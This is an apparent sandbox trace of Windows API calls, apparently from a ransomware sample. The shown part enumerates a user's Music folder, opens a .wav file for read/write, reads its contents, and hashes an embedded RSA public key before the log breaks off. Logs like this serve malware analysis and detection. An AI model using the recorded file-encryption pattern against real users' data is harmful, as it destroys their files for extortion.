lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.894] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\") returned="--nHV1eb\\" [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\") returned="ZmlmXoAngk\\" [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0238.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b861f8 [0238.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0238.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b861f8 | out: hHeap=0x620000) returned 1 [0238.895] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.895] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.895] PathFindFileNameW (pszPath="") returned="" [0238.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28745c0, ftCreationTime.dwHighDateTime=0x1d5c01a, ftLastAccessTime.dwLowDateTime=0x4f116840, ftLastAccessTime.dwHighDateTime=0x1d5b6be, ftLastWriteTime.dwLowDateTime=0x4f116840, ftLastWriteTime.dwHighDateTime=0x1d5b6be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.899] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28745c0, ftCreationTime.dwHighDateTime=0x1d5c01a, ftLastAccessTime.dwLowDateTime=0x4f116840, ftLastAccessTime.dwHighDateTime=0x1d5b6be, ftLastWriteTime.dwLowDateTime=0x4f116840, ftLastWriteTime.dwHighDateTime=0x1d5b6be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.899] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe52c8750, ftCreationTime.dwHighDateTime=0x1d5c40c, ftLastAccessTime.dwLowDateTime=0x24dea100, ftLastAccessTime.dwHighDateTime=0x1d5b9ca, ftLastWriteTime.dwLowDateTime=0x24dea100, ftLastWriteTime.dwHighDateTime=0x1d5b9ca, nFileSizeHigh=0x0, nFileSizeLow=0x9122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5-Hq4ryxhg.wav", cAlternateFileName="5-HQ4R~1.WAV")) returned 1 [0238.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0238.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.900] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\5-Hq4ryxhg.wav") returned=".wav" [0238.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\5-Hq4ryxhg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\5-hq4ryxhg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.901] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=37154) returned 1 [0238.901] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.904] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x90fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.904] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.906] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.906] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x9122, lpOverlapped=0x0) returned 1 [0238.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.908] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.909] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.909] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.909] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.909] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.909] GetLastError () returned 0x0 [0238.909] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.909] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.909] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.909] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.909] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9120) returned 0x3b95d50 [0238.910] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b861f8 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86240 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c38 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bf0 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.911] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bf0 | out: hHeap=0x620000) returned 1 [0238.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c38 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bf0 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400bd8 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bf0 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.912] GetCurrentThreadId () returned 0x5b4 [0238.912] RtlAllocateHeap 